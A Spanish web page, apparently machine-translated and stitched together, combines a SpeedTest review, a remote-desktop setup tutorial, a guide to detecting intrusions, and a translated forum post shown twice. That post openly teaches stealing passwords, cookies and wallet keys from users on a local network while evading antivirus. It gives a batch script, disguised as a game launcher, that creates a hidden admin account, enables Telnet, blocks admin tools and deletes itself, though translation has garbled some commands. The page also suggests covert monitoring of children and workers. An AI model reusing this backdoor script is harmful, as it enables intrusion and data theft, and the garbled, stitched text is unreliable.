Mando a distancia oculto. RMS oculto. Cómo hacer que una dirección IP cambiable sea permanente

× Cerrar


SpeedTest es un programa para computadora personal que te permite analizar el funcionamiento de tus redes y la velocidad de tu conexión de red.

Su objetivo principal es determinar la tasa de transferencia de datos entre dos nodos de la red.

SpeedTest consta de dos programas clave: SpeedSrv y SpeedClnt, cada uno de los cuales tiene como objetivo implementar tareas específicas. Si hablamos con más detalle sobre SpeedSrv, puede manejar simultáneamente múltiples conexiones y ejecutarse en un servidor o una estación de trabajo. SpeedSrv en una PC proporciona datos a SpeedClnt instalado en otra PC. Por su parte, SpeedClnt se conecta al primero, inicia la descarga y presenta los resultados de la transferencia. Además, SpeedClnt, al conectarse a cualquier sitio web especificado por el usuario, puede medir la velocidad de transferencia efectiva entre este y la computadora. SpeedClnt no almacena datos descargados.

La interfaz del programa es tan simple que es comprensible incluso para aquellos que recientemente dominan una computadora. El menú principal de este test de velocidad se divide en dos elementos: Archivo, que permite imprimir los datos y salir de SpeedTest, y Ayuda, donde encontrarás instrucciones básicas de uso. Debajo del menú principal hay una línea donde debe ingresar información, es decir, un enlace a un sitio o servidor, después de seleccionar lo que va a ingresar. A continuación se muestra un campo donde se muestra el resultado del análisis. La primera parte mostrará la información en forma de cuadrícula y la segunda mostrará el diagrama de inicio rápido.

  • Ventajas de la prueba de velocidad
  • velocidad de trabajo;
  • capacidad de comprobar la velocidad de transferencia de datos entre diferentes PC o sitios web;
  • interfaz sencilla y ordenada;
  • grilla informativa de resultados;
  • capacidad de imprimir resultados de pruebas;
  • SpeedSrv atiende a varios clientes simultáneamente;

Es posible incluir la velocidad base en la pantalla gráfica para comparar.

  • Desventajas de SpeedTest
  • la precisión del resultado depende de varios factores;
  • La eficacia del trabajo está garantizada únicamente por el funcionamiento simultáneo del cliente y el servidor;
  • para lograr la precisión de la medición, la prueba debe realizarse varias veces;

Existe un límite de tamaño de archivo para el servidor (no más de 4 GB).

Instalación de SpeedTest para Windows Descargando el archivo del programa siga el enlace de este sitio, ábralo e inicie la instalación. En la ventana que aparece en la pantalla de su PC, se escribirán varios comandos que deben ejecutarse. En particular, lea el acuerdo de licencia y acepte cumplirlo, seleccione una carpeta para guardar el software, etc. Es importante elegir de la lista proporcionada si va a instalar: SpeedSrv o SpeedClnt, o ambos. Después de hacer clic en " Finalizar", se abrirá una ventana del programa listo para usar.

Trabajar simultáneamente en varios ordenadores, de los cuales sólo uno está frente a ti y el resto incluso al otro lado de la Tierra, no es fantástico. Para tener esta maravillosa oportunidad, todo lo que necesita es acceso a Internet y un programa de control remoto en cada máquina.

Los programas de control remoto son puentes que conectan la PC o el dispositivo móvil que tiene frente a usted con varios dispositivos informáticos en todo el mundo. Eso sí, si tienes una clave, es decir, una contraseña que permita la conexión remota con ellos.

Las posibilidades de programas de este tipo son muy amplias. Esto incluye acceder al contenido de los discos, iniciar aplicaciones instaladas, cambiar la configuración del sistema y ver acciones del usuario... En resumen, le permiten hacer casi todo en una PC remota que puede hacer en una local. El artículo de hoy es una descripción general de seis programas gratuitos para el control remoto de una computadora con Windows (y no solo), uno de los cuales está incluido en el propio sistema operativo.

Si necesita establecer una conexión entre dos computadoras o una PC y un dispositivo móvil, uno de los cuales (remoto) ejecuta Windows y el segundo ejecuta Windows, iOS, Android o Mac OS X, a veces puede prescindir de terceros. programas de terceros (si la conexión involucra solo computadoras con Windows). La aplicación del sistema Escritorio remoto está presente en todas las ediciones de Windows, comenzando con XP. No es necesario que ambas máquinas tengan la misma versión del sistema operativo; puedes establecer fácilmente una conexión, por ejemplo, entre Windows 10 y Windows 7.

La aplicación Microsoft Remote Desktop para Android y Apple está disponible para su descarga gratuita en Google Play y App Store.

¿Qué más se necesita para crear una conexión?

  • Permiso de acceso remoto: configurado en la computadora que va a administrar externamente.
  • Una cuenta con una contraseña en la computadora remota. Para resolver tareas administrativas (instalar y desinstalar programas, cambiar la configuración del sistema, etc.) necesita una cuenta con derechos de administrador.
  • Conectando ambas máquinas a Internet o estando en la misma red local.
  • En el lado receptor, el puerto TCP 3389 está abierto (utilizado por Escritorio remoto de forma predeterminada).

Cómo habilitar el permiso

Esta y otras instrucciones se muestran usando Windows 10 como ejemplo.

  • Haga clic derecho en el icono "Esta PC" en el escritorio. Abramos "Propiedades".

  • Mientras esté en la ventana "Sistema", haga clic en "Configuración de acceso remoto" en el panel de transición. En la sección "Escritorio remoto" de la ventana, marque la casilla de verificación "Permitir..." (es mejor dejar la casilla de verificación "Permitir solo conexiones autenticadas"). A continuación, haga clic en "Seleccionar usuarios".

  • Para agregar un usuario al que se le permitirá conectarse con usted de forma remota, haga clic en "Agregar". En el campo "Ingresar nombres", ingrese el nombre de su cuenta en esta computadora (¡no lo olvide, debe tener una contraseña!), haga clic en "Verificar nombres" y Aceptar.

Esto completa la configuración.

Cómo configurar los ajustes de conexión

Realizamos los siguientes pasos en el ordenador desde el que realizaremos la conexión remota.

  • Haga clic en el icono de búsqueda en la barra de tareas y comience a escribir la palabra "remoto". Seleccione "Conexión a escritorio remoto" del encontrado.

  • De forma predeterminada, la ventana de la aplicación se abre minimizada, con solo campos para ingresar el nombre de la computadora y los datos del usuario. Para acceder a todas las configuraciones, haga clic en la flecha "Mostrar opciones". En la parte inferior de la primera pestaña, "General", hay un botón para guardar la configuración de conexión en un archivo. Esto es útil cuando utiliza diferentes configuraciones para conectarse a diferentes máquinas.

  • La siguiente pestaña, "Pantalla", le permite cambiar las propiedades de imagen de la pantalla de la computadora remota en su monitor. En particular, aumente y disminuya la resolución, utilice varios monitores, cambie la profundidad del color.

  • A continuación, configuraremos los "Recursos locales": sonido de una computadora remota, condiciones para usar atajos de teclado, acceso a una impresora remota y al portapapeles.

  • Los parámetros de la pestaña "Interacción" afectan la velocidad de conexión y la calidad de visualización de la imagen desde la máquina remota en su monitor.

  • La pestaña "Avanzado" le permite definir acciones si falla la autenticación de una PC remota, así como establecer parámetros de conexión cuando se conecta a través de una puerta de enlace.

  • Para iniciar una sesión de acceso remoto, haga clic en "Conectar". En la siguiente ventana, ingrese la contraseña.

Una vez que se establezca la conexión, la sesión de computadora del usuario actual finalizará y el control pasará a usted. El usuario del PC remoto no podrá ver su escritorio, ya que en su lugar aparecerá un salvapantallas.

Siguiendo estas instrucciones, se conectará fácilmente a una computadora que esté en la misma red que la suya. Si los dispositivos están conectados a diferentes redes, deberá realizar varias configuraciones adicionales.

Cómo conectarse a una computadora remota a través de Internet

Hay dos formas de configurar una conexión a Escritorio remoto de Windows a través de Internet: creando un canal VPN para que los dispositivos se vean entre sí como si estuvieran en la misma red local y reenviando el puerto 3389 a la red local y cambiando el Direcciones IP dinámicas (variables) de la máquina remota a permanentes (estáticas).

Hay muchas formas de crear canales VPN, pero describirlas todas requerirá mucho espacio (además, se puede encontrar fácilmente mucha información al respecto en Internet). Por tanto, veamos como ejemplo uno de los más sencillos: utilizar las propias herramientas de Windows.

Cómo crear un canal VPN en Windows

En la máquina remota que será el servidor:


Después de esto, aparecerá el componente “Conexiones entrantes” en la carpeta de conexiones de red, que será el servidor VPN. Para evitar que el firewall bloquee la conexión, no olvide abrir el puerto TCP 1723 en el dispositivo. Y si al servidor se le asigna una dirección IP local (comenzando con 10, 172.16 o 192.168), el puerto deberá ser redirigido. a la red externa. Cómo hacer esto, lea a continuación.

En la computadora cliente (Windows 10), configurar la conexión es aún más fácil. Inicie la utilidad "Configuración", vaya a la sección "Redes e Internet" -> "VPN". Haga clic en "Agregar conexión VPN".

En la ventana de parámetros, especifique:

  • Proveedor de servicios: Windows.
  • Nombre de la conexión: cualquiera.
  • Nombre o dirección del servidor: IP o nombre de dominio del servidor que creó antes.
  • Tipo de VPN: detectar automáticamente o PPTP.
  • Tipo de datos de inicio de sesión: inicio de sesión y contraseña (una de las cuentas a las que le ha dado permiso de acceso). Para evitar ingresar estos datos cada vez que se conecta, ingréselo en los campos correspondientes a continuación y marque la casilla de verificación "Recordar".


Reenvío de puertos en el enrutador y obtención de una IP estática

La redirección de puertos (reenvío) se realiza de forma diferente en diferentes dispositivos (enrutadores), pero el principio general es el mismo en todas partes. Veamos cómo se hace esto usando el ejemplo de un enrutador doméstico típico de TP-Link.

Abramos las secciones "Reenvío" y "Servidores virtuales" en el panel de administración del enrutador. En la mitad derecha de la ventana, haga clic en el botón "Agregar".

En la ventana "Agregar o editar entrada", ingrese la siguiente configuración:

  • Puerto de servicio: 3389 (o 1723 si está configurando una VPN).
  • El puerto interno es el mismo.
  • Dirección IP: dirección del ordenador (mira en las propiedades de conexión) o nombre de dominio.
  • Protocolo: TCP o todos.
  • Puerto de servicio estándar: no puede especificarlo ni seleccionarlo de la lista PDP, y para VPN – PPTP.

Cómo hacer que una dirección IP cambiable sea permanente

El paquete estándar de proveedores de servicios de Internet para suscriptores domésticos, por regla general, solo incluye una dirección IP dinámica, que cambia constantemente. Y asignar una IP permanente a un usuario suele costarle mucho dinero. Para que no tenga que incurrir en costes adicionales, existen servicios DDNS (DNS dinámico), cuya tarea es asignar un nombre de dominio permanente a un dispositivo (computadora) con una dirección de red cambiante.

Muchos servicios DDNS ofrecen sus servicios de forma gratuita, pero también hay quienes cobran una pequeña tarifa de suscripción por ello.

A continuación se muestra una breve lista de DDNS gratuitos, cuyas capacidades son más que suficientes para nuestra tarea.

Las reglas para utilizar estos servicios, si difieren, son insignificantes: primero registramos una cuenta, luego confirmamos la dirección de correo electrónico y finalmente registramos el nombre de dominio de su dispositivo y lo activamos. Después de esto, la computadora de su hogar tendrá su propio nombre en Internet, por ejemplo, 111pc.ddns.net. Este nombre debe especificarse en la configuración de conexión en lugar de la IP o el nombre de la red local.

Por cierto, algunos enrutadores solo admiten un pequeño grupo de proveedores DDNS, por ejemplo, solo el DynDNS más antiguo y famoso (ahora pago) y No IP. Y otros, como Asus, cuentan con su propio servicio DDNS. La instalación de firmware alternativo DD-WRT en el enrutador ayuda a eliminar las restricciones.

Pros y contras de usar el Escritorio remoto de Windows

La principal ventaja de la herramienta propia de Windows frente a los desarrollos de terceros es la ausencia de servidores intermediarios durante la conexión, lo que supone un riesgo reducido de fuga de datos. Además, esta herramienta tiene muchas configuraciones flexibles y, con un enfoque hábil, puede convertirse en una "fortaleza inexpugnable" y un "cohete espacial".

Otras ventajas del escritorio de Windows son que no es necesario descargar nada, no hay restricciones en cuanto a la duración de la sesión, el número de conexiones y es gratuito.

Desventajas: dificultad para configurar el acceso a través de Internet, vulnerabilidad a los ataques Pass the Hash.

Visor de equipo

Antes de comenzar a utilizar el servicio, deberá registrar una cuenta de Google (los usuarios de dispositivos Android ya tienen una) o iniciar sesión con ella en el navegador Google Chrome.

La ventana principal del Escritorio Chrome incluye 2 secciones:

  • Soporte remoto. Contiene opciones para administrar una conexión única a otra PC y brindar acceso a la suya.
  • Mis computadoras. Esta sección contiene máquinas con las que previamente ha establecido una conexión y puede conectarse rápidamente a ellas mediante un código PIN determinado.

Durante la primera sesión de comunicación utilizando Chrome Desktop, se instalará un componente adicional (host) en la computadora remota, lo que tardará entre 2 y 3 minutos. Cuando todo esté listo, aparecerá un código secreto en la pantalla. Después de ingresarlo en el campo correspondiente, haga clic en "Conexión".

Al igual que con TeamViewer, el usuario de la máquina remota podrá ver todas sus acciones en la pantalla. Por tanto, para la vigilancia encubierta, por ejemplo, de un niño, estos programas no son adecuados.

es una utilidad muy simple e igualmente confiable diseñada para el control remoto de computadoras con Windows y Linux. Sus principales ventajas son la facilidad de uso, la fiabilidad, la alta velocidad de conexión y el hecho de que no requiere instalación. Las desventajas son la falta de versiones móviles (no será posible establecer una conexión a través de Android e iOS usando este programa) y el hecho de que muchos antivirus lo consideran malicioso e intentan eliminarlo. Afortunadamente, esto último es fácil de prevenir agregando la utilidad a las excepciones.

Ammyy Admin admite 2 métodos para establecer comunicación: por número de identificación y por dirección IP. El segundo funciona sólo a través de la red local.

La ventana de la utilidad está dividida en 2 mitades: "Cliente", donde se encuentran los datos de identificación de la computadora y la contraseña, y "Operador", con campos para ingresar estos datos. El botón de conexión también se encuentra aquí.

La libreta de contactos y la configuración del programa, que son bastante simples, están ocultas en el menú "Ammyy".

- otro programa compacto y portátil de Windows, exteriormente similar al anterior, pero con un conjunto de funciones más interesante. Admite 2 métodos de conexión, por ID e IP, y 3 modos: control total, administrador de archivos (transferencia de archivos) y visualización solo de la pantalla de una PC remota.

También le permite definir varios niveles de derechos de acceso:

  • Uso del operador remoto de teclado y mouse.
  • Sincronización del portapapeles.
  • Cambiar los derechos de acceso por parte de un administrador, etc.

El modo "Solo visualización" se puede utilizar para monitorear de forma encubierta las acciones de los usuarios de máquinas remotas (niños, trabajadores), que no está disponible en productos similares.

En la ventana principal de AeroAdmin hay un botón para abrir un chat de correo electrónico (ubicado al lado del botón "Detener"). El chat está diseñado para enviar rápidamente un correo electrónico al operador, por ejemplo, pidiendo ayuda. Esta función es única, ya que programas análogos sólo tienen un chat normal para mensajes de texto. Y comienza a funcionar solo después de que se establece la conexión.

Lamentablemente, el libro de contactos de AeroAdmin no estará disponible de inmediato. Requiere activación por separado, a través de Facebook. Y solo los miembros de esta red social pueden utilizarlo, ya que para recibir un código de activación los desarrolladores solicitan un enlace a su página personal. Resulta que a quienes les gustó el programa no pueden prescindir de registrarse en Facebook.

Otra característica de AeroAdmin es que se puede utilizar de forma gratuita incluso con fines comerciales, si no se necesitan funciones adicionales (conexión continua, múltiples sesiones paralelas, etc.), disponible sólo en versiones pagas.

es la última utilidad de la revisión de hoy para conectarse de forma remota a una PC con Windows desde otra computadora o dispositivo móvil. Se puede utilizar sin instalación o con ella.

Al igual que sus predecesores, tiene una serie de funciones únicas:

  • La mayor velocidad de transferencia de imágenes desde una máquina remota.
  • El intercambio de archivos más rápido, incluso con velocidades de Internet bajas.
  • Admite la conexión simultánea de múltiples usuarios remotos. La capacidad de colaborar en un proyecto (cada usuario tiene su propio cursor).

Además, al igual que otros programas de esta clase, AnyDesk proporciona al operador acceso completo a las funciones de la máquina remota, se conecta de forma muy sencilla (mediante ID y contraseña) y protege de forma fiable los datos transmitidos.

Hola a todos, este es mi primer artículo sobre Habré, así que no juzguéis demasiado duramente. En esta publicación, describiré cómo puede acceder de forma remota a la computadora de un usuario en su red local a través de la línea de comando, evitando todos los programas antivirus y conociendo un poco sobre la sintaxis de la línea de comando de Windows. El artículo está destinado a ser utilizado únicamente en Windows XP, pero si lo desea, puede reescribir el código para cualquier otro sistema operativo Windows. Así que comencemos. En general, el artículo está escrito para usuarios principiantes. El objetivo más importante es obtener los datos necesarios (contraseñas, inicios de sesión, dachas, acceso a buzones de correo, archivos de claves de Webmoney, cookies y otros datos importantes) y pasar desapercibidos, sin dejar rastros de penetración. Entonces, comencemos, estoy en una red local con alrededor de 5000 usuarios, una red con estática o dhcp no importa, obtuve la dirección IP y estoy feliz. Hay muchas subredes en la red cuyas rutas están registradas en el servidor. La dirección MAC de la computadora queda registrada con el administrador de red, ya que en mi caso esta era una condición para conectarme a la red, por lo que mi Mac se iluminará si pasa algo. Para evitar que nos encuentren, primero que nada instalamos una máquina virtual (usé VmWare 5.1), instalamos XP en ella, un escáner de puertos (usé SuperScan 3.00, puedes descargarlo) e iniciamos el servicio Telnet. Conectamos la máquina virtual a la red mediante NAT y así obtenemos una dirección mac completamente diferente de la máquina que mira en la red. Todos hemos instalado la máquina virtual, sigamos adelante. Abra un bloc de notas normal y escriba un archivo por lotes con el siguiente contenido:

@Eco apagado
Usuario de red Admin_Support lop /add >nul
grupo local neto grupo local neto
Cuentas netas /maxpwage:ilimitado >nul sc config TlntSvr start= auto >nul
Sc iniciar TlntSvr >nul
Reg agregue "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Admin_support /t REG_DWORD /d 0 >null
Reg agregue "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System" /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Reg agregue "HKCU\SOFTWARE\POLICIES\Microsoft\MMC" /v RestrictPemitSnapins /t Reg_dword / d 1 /f >nul del %SestemRoot%\system32\compmgmt.msc >nul
del Start_game.bat

Etiquetas: virus, hacking, seguridad, seguridad de la información

Es bastante molesto cuando alguien obtiene acceso no autorizado a su computadora. Si cree que su computadora ha sido pirateada, desconéctela de Internet. Luego encuentre las vulnerabilidades que el atacante aprovechó para ingresar al sistema y solucionarlas. Luego tome medidas para evitar intrusiones similares en el futuro.

Pasos

Parte 1

Bloquear el acceso no autorizado

    Tenga en cuenta que su computadora puede encenderse automáticamente para instalar actualizaciones. La mayoría de las últimas versiones de los sistemas operativos se actualizan automáticamente; Como regla general, esto sucede por la noche, cuando nadie usa la computadora. Si su computadora se enciende sin su conocimiento (es decir, cuando no la está usando), lo más probable es que haya salido del modo de suspensión para instalar actualizaciones.

    • Un atacante podría obtener acceso remoto a la computadora, pero esto es poco probable. Pero se pueden tomar algunas medidas para evitar el intento de intrusión en sí.
  1. Busque señales obvias de acceso remoto. Si el cursor se mueve, se inician programas y se eliminan archivos sin su participación, alguien ha obtenido acceso a la computadora. En este caso, apague la computadora y desconecte el cable Ethernet.

    • Si encuentra programas desconocidos o la velocidad de su conexión a Internet ha disminuido, esto no significa que su computadora haya sido pirateada.
    • Muchos programas que se actualizan abren automáticamente ventanas emergentes durante el proceso de actualización.
  2. Desconecte su computadora de Internet. Haga esto si cree que su computadora ha sido pirateada. Desconecte su computadora no solo de Internet, sino también de la red local para evitar el acceso no autorizado a otras computadoras.

    • Apague su enrutador inalámbrico y desconecte el cable Ethernet de su computadora.
  3. Inicie el Administrador de tareas o el Monitor del sistema. Con estas utilidades, puede determinar los procesos activos.

    • En Windows, presione Ctrl + ⇧ Mayús + Esc.
    • En Mac OS, abra la carpeta Aplicaciones - Utilidades y haga clic en Monitor del sistema.
  4. En la lista de programas en ejecución, busque programas para acceso remoto. Busque también en esta lista programas desconocidos o sospechosos. Los siguientes programas son programas populares de acceso remoto que se instalan sin el conocimiento del usuario.

    • VNC, RealVNC, TightVNC, UltraVNC, LogMeIn, GoToMyPC y TeamViewer
    • Busque también programas desconocidos o sospechosos. Si no conoce el propósito de un proceso activo en particular, busque información al respecto en Internet.
  5. Tenga en cuenta que la carga de la CPU es anormalmente alta. Se muestra en el Administrador de tareas o en el Monitor del sistema. El uso elevado de la CPU es normal y no indica un hackeo de la computadora, pero si ocurre cuando nadie está usando la computadora, lo más probable es que haya muchos procesos ejecutándose en segundo plano, lo cual es muy sospechoso. Tenga en cuenta que el uso elevado de la CPU se produce durante las actualizaciones del sistema en segundo plano o las descargas de archivos grandes (que se olvidó).

    Escanee su sistema con un programa antivirus. Asegúrese de instalar un antivirus o no desactive Windows Defender. Abra su programa antivirus y ejecute un análisis de su sistema operativo. Un escaneo completo tardará aproximadamente una hora.

    • Si su computadora no tiene antivirus, descárguelo en otra computadora y cópielo a su computadora usando una unidad USB. Instale un antivirus y escanee el sistema.
  6. Eliminar archivos encontrados por el antivirus. Si tu antivirus detecta malware, elimínalo o envíalo a “cuarentena” (esto depende del antivirus); en este caso, los programas encontrados ya no dañarán la computadora.

    Descargue e instale Malwarebytes Anti-Malware. Este es un programa que detecta y neutraliza el malware que no encuentra el antivirus. Malwarebytes Anti-Malware se puede descargar de forma gratuita desde malwarebytes.org.

    • Dado que su computadora está desconectada de Internet, descargue Malwarebytes Anti-Malware en otra computadora y cópielo a su computadora usando una unidad USB.
  7. Escanee su sistema con Anti-Malware. El escaneo completo tardará unos 30 minutos. Es posible que Anti-Malware detecte un programa malicioso que esté controlando su computadora.

    Enviar el malware detectado a “cuarentena”. En este caso, los programas encontrados ya no dañarán la computadora.

    Descargue y ejecute Malwarebytes Anti-Rootkit Beta. Este programa se puede descargar de forma gratuita desde malwarebytes.org/antirootkit/. Anti-Rootkit Beta detecta y elimina rootkits, que son programas maliciosos que permiten a un atacante afianzarse en un sistema y ocultar rastros de entrada. Un análisis completo del sistema llevará algún tiempo.

    Supervise el comportamiento de su computadora después de eliminar el malware. Incluso si su programa antivirus y/o antimalware encontró y eliminó malware, controle el comportamiento de su computadora para determinar si hay malware oculto.

    Cambie todas las contraseñas. Si su computadora es pirateada, lo más probable es que el atacante haya obtenido sus contraseñas utilizando un registrador de teclas. En este caso, cambie las contraseñas de varias cuentas. No utilice la misma contraseña para varias cuentas.

    Cerrar sesión en todas las cuentas. Haga esto después de cambiar sus contraseñas. Cierre sesión en sus cuentas en todos los dispositivos en los que utilice estas cuentas. En este caso, el atacante no podrá utilizar las contraseñas antiguas.

  8. Reinstale el sistema operativo si no puede bloquear el acceso no autorizado a su computadora. Esta es la única forma confiable de prevenir intrusiones y deshacerse de todos los archivos maliciosos. Antes de reinstalar el sistema, cree una copia de seguridad de los datos importantes, ya que durante el proceso de reinstalación del sistema, se eliminará toda la información.

    • Al hacer una copia de seguridad de sus datos, escanee cada archivo porque existe el riesgo de que los archivos antiguos provoquen una infección del sistema reinstalado.
    • Continúe leyendo para obtener más información sobre cómo reinstalar su sistema Windows o Mac OS.

    parte 2

    Prevenir el acceso no autorizado
    1. Configure actualizaciones automáticas de su programa antivirus. Un antivirus moderno detecta el malware antes de que llegue a su computadora. Windows viene preinstalado con Windows Defender, que es un buen antivirus que se ejecuta y actualiza en segundo plano. También puedes descargar un excelente antivirus gratuito como BitDefender, Avast! o AVG. Recuerda que sólo puedes instalar un programa antivirus en tu computadora.

      • Lea para obtener más información sobre cómo habilitar Windows Defender.
      • Leer
señor negro 2 de febrero de 2012 a las 14:23

La forma oculta más sencilla de acceder a la PC deseada desde su red doméstica

  • Armario *

Hola a todos, este es mi primer artículo sobre Habré, así que no juzguéis demasiado duramente. En esta publicación, describiré cómo puede acceder de forma remota a la computadora de un usuario en su red local a través de la línea de comando, evitando todos los programas antivirus y conociendo un poco sobre la sintaxis de la línea de comando de Windows. El artículo está destinado a ser utilizado únicamente en Windows XP, pero si lo desea, puede reescribir el código para cualquier otro sistema operativo Windows. Así que comencemos. En general, el artículo está escrito para usuarios principiantes. El objetivo más importante es obtener los datos necesarios (contraseñas, inicios de sesión, dachas, acceso a buzones de correo, archivos de claves de Webmoney, cookies y otros datos importantes) y pasar desapercibidos, sin dejar rastros de penetración. Entonces, comencemos, estoy en una red local con alrededor de 5000 usuarios, una red con estática o dhcp no importa, obtuve la dirección IP y estoy feliz. Hay muchas subredes en la red cuyas rutas están registradas en el servidor. La dirección MAC de la computadora queda registrada con el administrador de red, ya que en mi caso esta era una condición para conectarme a la red, por lo que mi Mac se iluminará si pasa algo. Para evitar que nos encuentren, primero que nada instalamos una máquina virtual (usé VmWare 5.1), instalamos XP en ella, un escáner de puertos (usé SuperScan 3.00, puedes descargarlo) e iniciamos el servicio Telnet. Conectamos la máquina virtual a la red mediante NAT y así obtenemos una dirección mac completamente diferente de la máquina que mira en la red. Todos hemos instalado la máquina virtual, sigamos adelante. Abra un bloc de notas normal y escriba un archivo por lotes con el siguiente contenido:

@Eco apagado
Usuario de red Admin_Support lop /add >nul
grupo local neto grupo local neto
Cuentas netas /maxpwage:ilimitado >nul sc config TlntSvr start= auto >nul
Sc iniciar TlntSvr >nul
Reg agregue "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Admin_support /t REG_DWORD /d 0 >null
Reg agregue "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System" /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Reg agregue "HKCU\SOFTWARE\POLICIES\Microsoft\MMC" /v RestrictPemitSnapins /t Reg_dword / d 1 /f >nul del %SestemRoot%\system32\compmgmt.msc >nul
del Start_game.bat

Etiquetas: virus, hacking, seguridad, seguridad de la información




Arriba